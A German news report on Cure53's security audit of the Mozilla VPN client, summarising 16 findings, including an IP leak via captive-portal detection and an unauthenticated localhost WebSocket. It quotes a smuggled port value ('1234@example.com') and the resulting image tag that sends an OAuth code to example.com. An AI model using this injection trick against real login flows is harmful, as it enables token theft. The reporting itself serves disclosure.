Die Ergebnisse des Audits der Mozilla VPN-Client wurden veröffentlicht

Die Firma Mozilla hat den Abschluss eines unabhängigen Audits der Client-Software für den Zugriff auf den Mozilla VPN-Dienst bekanntgegeben. Im Rahmen des Audits wurde die eigenständige Client-Anwendung, die mit der Qt-Bibliothek entwickelt wurde und für Linux, macOS, Windows, Android und iOS bereitgestellt wird, analysiert. Mozilla VPN nutzt mehr als 400 Server des schwedischen VPN-Anbieters Mullvad, die in über 30 Ländern platziert sind. Der Zugriff auf VPN-den Dienst erfolgt über das WireGuard-Protokoll.

Das Audit wurde von Cure53 durchgeführt, die auch die Audits der Projekte NTPsec, SecureDrop, Cryptocat, F-Droid und Dovecot geleitet haben. Das Audit umfasste die Überprüfung des Quellcodes und beinhaltete Tests zur Identifizierung möglicher Sicherheitsanfälligkeiten (Fragen der Kryptografie wurden nicht behandelt). Während der Prüfung wurden 16 Sicherheitsprobleme festgestellt, davon hatten 8 den Charakter von Empfehlungen, 5 wurden als niedriges Risiko, 2 als mittleres und 1 als hohes Risiko eingestuft.

Dabei wurde nur ein Problem mit mittlerem Gefährdungsgrad als Schwachstelle eingestuft, da nur dieses ausnutzbar war. Das genannte Problem führte zu einem Datenleck über die Verwendung von VPN im Code zur Feststellung des captive portals, da unverschlüsselte direkte HTTP-Anfragen außerhalb des VPN-Tunnels gesendet wurden und die Haupt-IP-Adresse des Benutzers offenlegten, falls ein Angreifer den Transitverkehr kontrollieren konnte. Das Problem wird behoben, indem der Modus zur Erkennung des captive portals in den Einstellungen deaktiviert wird.

Das zweite Problem mittlerer Gefährdung hängt mit dem Fehlen einer angemessenen Bereinigung von nicht-numerischen Werten im Portnummer zusammen. Dies ermöglicht das Leaken von OAuth-Authentifizierungsparametern durch das Ersetzen der Portnummer mit einer Zeichenkette wie "1234@example.com", was zur Installation eines Tags führt. <img src="»http://127.0.0.1:1234@example.com/?code=…»" alt="»»">, das auf example.com statt auf 127.0.0.1 verweist.

Das dritte Problem, das als gefährlich eingestuft wurde, ermöglicht es jeder lokalen Anwendung, ohne Authentifizierung auf den VPN-Client über einen WebSocket, der an localhost gebunden ist, zuzugreifen. Ein Beispiel zeigt, wie bei aktivem VPN-Client jede Webseite die Erstellung und das Senden von Screenshots durch die Generierung eines Ereignisses screen_capture organisieren konnte. Das Problem wurde nicht als Schwachstelle eingestuft, da der WebSocket nur in internen Testversionen verwendet wurde und die Nutzung dieses Kommunikationskanals nur für die zukünftige Interaktion mit einer Browsererweiterung geplant war.

Quelle: opennet.ru

Kaufen Sie zuverlässiges Hosting für Websites mit DDoS-Schutz, VPS VDS-Server 🔥 Kaufen Sie zuverlässiges Hosting für Websites mit DDoS-Schutz, VPS VDS-Server | ProHoster